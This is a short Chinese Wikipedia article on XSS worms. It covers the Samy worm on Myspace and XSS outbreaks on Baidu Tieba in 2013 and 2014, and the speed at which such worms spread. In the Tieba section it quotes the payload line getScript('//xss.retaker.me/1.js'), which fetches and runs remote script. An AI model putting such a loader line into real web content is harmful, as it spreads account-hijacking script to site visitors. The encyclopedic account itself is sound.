Xss蠕虫

维基百科,自由的百科全书
跳转至: 导航搜索

xss蠕虫( cross site scripting worm)是一种跨站病毒, 通常由脚本语言Javascript写成, 它借由网站访问者传播

历史[编辑]

历史第一个XSS蠕虫是针对网站Myspace的Samy,它在20小时内感染了100万个账户, 作者Samy Kamkar之后被起诉

新浪微博[编辑]

对新浪微博的争议#XSS.E6.BC.8F.E6.B4.9E

百度贴吧[编辑]

2013年5月19日, 百度贴吧转帖功能再度出现xss漏洞,大量贴吧内充斥接近满版面, 包含代码getScript('//xss.retaker.me/1.js')为标题的帖子, 当已登陆用户打开这样的帖子, 用户所持账户便以相同方式在多个贴吧转帖原作者的帖, 部分网络安全相关人士认为贴吧爆发了大规模XSS蠕虫感染 [1] [2] [3]

2014年3月9日, 百度贴吧转帖功能再度出现xss漏洞

性质[编辑]

由于XSS蠕虫基于浏览器而不是操作系统, 取决于其依赖网站的规模, 它可以在短时间内达到对巨大数量的计算机感染

参考[编辑]

  1. ^ 百度贴吧XSS蠕虫大量爬行
  2. ^ 谷歌搜索
  3. ^ 新浪微博, "xss 贴吧"